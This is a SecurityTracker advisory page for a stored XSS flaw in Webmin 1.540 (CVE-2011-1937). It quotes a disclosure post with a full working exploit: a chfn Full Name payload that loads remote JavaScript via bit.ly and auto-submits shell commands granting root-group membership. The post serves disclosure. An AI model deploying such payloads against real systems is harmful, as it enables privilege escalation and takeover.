SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com





Category:   Application (Generic)  >   Webmin Vendors:   Cameron, Jamie
Webmin Unescaped Full Name Value Permits Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1025438
SecurityTracker URL:  http://securitytracker.com/id/1025438
CVE Reference:   CVE-2011-1937   (Links to External Site)
Updated:  Jun 2 2011
Original Entry Date:  Apr 25 2011
Impact:   Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 1.540 and prior versions
Description:   A vulnerability was reported in Webmin. A remote user can conduct cross-site scripting attacks.

The software does not properly filter HTML code from user-supplied input in the user's full name before displaying the input. A remote user can cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the Webmin software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Javier Bassi reported this vulnerability.
Impact:   A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the Webmin software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
Solution:   The vendor has issued a source code fix, available at:

https://github.com/webmin/webmin/commit/46e3d3ad195dcdc1af1795c96b6e0dc778fb6881
Vendor URL:  www.webmin.com/ (Links to External Site)
Cause:   Input validation error
Underlying OS:   Windows (Any)

Message History:   None.

 Source Message Contents
Date:  Sat, 23 Apr 2011 21:46:55 -0300
Subject:  [Full-disclosure] XSS in Webmin 1.540 + exploit for privilege escalation

Information
--------------------
Name :  XSS vulnerability in Webmin
Software :  All versions prior to and including 1.540 are affected.
Vendor Hompeage :  http://www.webmin.com
Vulnerability Type :  Cross-Site Scripting
Severity :  Medium
Researcher :  Javier Bassi <javierbassi [at] gmail [dot] com>


Description
------------------
Webmin is a web-based interface for system administration for Unix.
Using any modern web browser, you can setup user accounts, Apache,
DNS, file sharing and much more.
https://secure.wikimedia.org/wikipedia/en/wiki/Webmin


Details
-------------------
Webmin is affected by a XSS vulnerability in all versions prior to and
including 1.540.
Webmin fails to sanitize $real in useradmin/index.cgi. $real is the
"Full Name" in the finger information of the user. useradmin/index.cgi
is the control panel of the "Users & Groups" section in webmin.
An attacker that has a normal user on the victim's machine could be
able to change his Full Name with chfn command, inject XSS and execute
commands as root.


Timeline:
-------------------
2011.04.24 - announced at my site/informed developers/disclosed at my site.


Solution:
-------------------
wait for updates.


Developing a exploit:
-------------------
With Webmin you can execute shell commands and the only security
measure Webmin has is checking the Referer in the HTTP headers. So we
can't use <iframe>, but we can bypass this protection by injecting a
code that execute a Javascript file that prints a form that
autosubmits itself to the Webmin's shell.cgi and execute mutiple
commands in the format command1;command2;...;commandn
So XSS-->.js-->form-->autosubmit-->shell.cgi

The injected code will be displayed inside a form, so we need to close
the original form first with </form>.
The shell/index.cgi form is the next one:

</form><form class='ui_form' style="visibility:hidden"
action='https://zion:10000/shell/index.cgi' method=post
enctype=multipart/form-data >
<input class='ui_submit' type=submit value="Execute command:">
<input class='ui_textbox'type=hidden name="cmd" value="" size=50
style='width:100%'></td>
<input class='ui_submit' type=submit name="clear" value="Clear history">
<input class='ui_hidden' type=hidden name="pwd" value="/root">
<input class='ui_hidden' type=hidden name="history" value="">
<input class='ui_hidden' type=hidden name="previous" value="find /usr
-name sftp-server">
<input class='ui_hidden' type=hidden name="previous" value="echo
/usr/lib/sftp-server >> /etc/shells">
<input class='ui_hidden' type=hidden name="previous" value="cat /etc/shells">
<input class='ui_hidden' type=hidden name="previous" value="find
/usr/lib -name sftp-server">
<input class='ui_hidden' type=hidden name="previous" value="echo
/usr/lib/openssh/sftp-server >> /etc/shells">
<input class='ui_submit' type=submit name="doprev" value="Execute
previous command">
<select class='ui_select' name="pcmd" ><option value="echo
/usr/lib/openssh/sftp-server >> /etc/shells" >echo
/usr/lib/openssh/sftp-server >> /etc/shells
<option value="find /usr/lib -name sftp-server" >find /usr/lib -name sftp-server
<option value="cat /etc/shells" >cat /etc/shells
<option value="echo /usr/lib/sftp-server >> /etc/shells" >echo
/usr/lib/sftp-server >> /etc/shells
<option value="find /usr -name sftp-server" >find /usr -name sftp-server
</select><input type=button name=movecmd value='Edit previous'
onClick='cmd.value = pcmd.options[pcmd.selectedIndex].value'>
<input class='ui_submit' type=submit name="clearcmds" value="Clear commands">
</form>

We use Javascript to autosubmit it. We add id="lala" in form tag and
also we add the next script at the end of the code:
<script>document.getElementById('lala').submit();</script>

Commands go in 'cmd' input. A nice combination of commands could be:
chfn -f "safename" neo;usermod -G root neo;usermod -g root neo;killall
-9 firefox-bin
So when the admim browse "Users & Groups" this will change the Full
name of our user 'neo' back to a safe one, makes us root and kill
firefox. The admin will think firefox crashed and when he goes back to
"Users and Groups" in Webmin it will not crash again beause we already
changed our full name.
To include commands in value="" they must be html escaped: (
http://www.htmlescape.net/htmlescape_tool.html )
chfn -f &quot;safename&quot; neo;usermod -G root neo;usermod -g root
neo;killall -9 firefox-bin

Now we need a .js file that prints the form + the autosubmit code.
(thx to http://accessify.com/tools-and-wizards/developer-tools/html-javascript-convertor/
)
It will look like this

document.write("<\/form><form class='ui_form'
style=\"visibility:hidden\" id=\"lala\"
action='https:\/\/zion:10000\/shell\/index.cgi' method=post
enctype=multipart\/form-data >");
document.write("<input class='ui_submit' type=submit value=\"Execute
command:\">");
document.write("<input class='ui_textbox'type=hidden name=\"cmd\"
value=\"chfn -f &quot;safename&quot; neo;usermod -G root neo;usermod
-g root neo;killall -9 firefox-bin\" size=50
style='width:100%'><\/td>");
document.write("<input class='ui_submit' type=submit name=\"clear\"
value=\"Clear history\">");
document.write("<input class='ui_hidden' type=hidden name=\"pwd\"
value=\"\/root\">");
document.write("<input class='ui_hidden' type=hidden name=\"history\"
value=\"\">");
document.write("<input class='ui_hidden' type=hidden name=\"previous\"
value=\"find \/usr -name sftp-server\">");
document.write("<input class='ui_hidden' type=hidden name=\"previous\"
value=\"echo \/usr\/lib\/sftp-server >> \/etc\/shells\">");
document.write("<input class='ui_hidden' type=hidden name=\"previous\"
value=\"cat \/etc\/shells\">");
document.write("<input class='ui_hidden' type=hidden name=\"previous\"
value=\"find \/usr\/lib -name sftp-server\">");
document.write("<input class='ui_hidden' type=hidden name=\"previous\"
value=\"echo \/usr\/lib\/openssh\/sftp-server >> \/etc\/shells\">");
document.write("<input class='ui_submit' type=submit name=\"doprev\"
value=\"Execute previous command\">");
document.write("<select class='ui_select' name=\"pcmd\" ><option
value=\"echo \/usr\/lib\/openssh\/sftp-server >> \/etc\/shells\" >echo
\/usr\/lib\/openssh\/sftp-server >> \/etc\/shells");
document.write("<option value=\"find \/usr\/lib -name sftp-server\"
>find \/usr\/lib -name sftp-server");
document.write("<option value=\"cat \/etc\/shells\" >cat \/etc\/shells");
document.write("<option value=\"echo \/usr\/lib\/sftp-server >>
\/etc\/shells\" >echo \/usr\/lib\/sftp-server >> \/etc\/shells");
document.write("<option value=\"find \/usr -name sftp-server\" >find
\/usr -name sftp-server");
document.write("<\/select><input type=button name=movecmd value='Edit
previous' onClick='cmd.value =
pcmd.options[pcmd.selectedIndex].value'>");
document.write("<input class='ui_submit' type=submit
name=\"clearcmds\" value=\"Clear commands\">");
document.write("<\/form><script>document.getElementById('lala').submit();<\/script>");

We have to upload the file somewhere and use a url shotener.

Now we need the script code that loads the .js file. Linux program
chfn limits the Full name field to 80 chars and restrict the next
three chars:
 = (equal) , (comma) or : (colon)
The XSS code we can use is the next one (tested in FF4.0):
<script>document.write("<script src\u003d//bit.ly/g2KmJP></scr"+"ipt>")</script>
(this code bypass NoScript anti-XSS protection)

To perform the exploit we have login and change our finger information

neo@Zion ~ $ chfn
Password:
Changing the user information for neo
Enter the new value, or press ENTER for the default
	Full Name [safename]: <script>document.write("<script
src\u003d//bit.ly/g2KmJP></scr"+"ipt>")</script>
	Room Number []:
	Work Phone []:
	Home Phone []:
neo@Zion ~ $

Finally we wait for the admin to invite us to join the root group ;)


Other considerations
-------------------
* The "//" in the XSS code is equal to "http://" only in the cases in
which the code is placed in an http:// website. Because Webmin panel
is https:// we need a URL shortener service with SSL and a valid
certificate. That's why I used bit.ly. The shortest ones like goo.gl
and sr.pr don't have valid SSL ceterfiticate so a warning will appear
in most browsers when trying to access them via https asking us if we
want to continue. In an exploit scenario we can't use them.
* We will be able to modify our Full Name with chfn only if constant
CHFN_RESTRICT is set to "frwh" in /etc/login.defs. This is the default
config in Mandriva and Slackware but not in Debian which is set to
"rwh". I don't know about other distros.
* With XSS we could have also steal admin's cookie but it's most
likely that NoScript will block that attack. The reason why NS can't
block this one is because is not exactly a typical cross-domain XSS.
This is HTML injection or permanent XSS.


Credits
-------------------
Javier Bassi- http://javierb.com.ar
Special thanks to barbarianbob from sla.ckers.org for compressing the
XSS from 92 chars to 80.


References
-------------------
1. Advisory URL: http://javierb.com.ar/2011/04/24/xss-webmin-1-540/
2. Exploit in action: http://www.youtube.com/watch?v=CUO7JLIGUf0

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us

Copyright 2013, SecurityGlobal.net LLC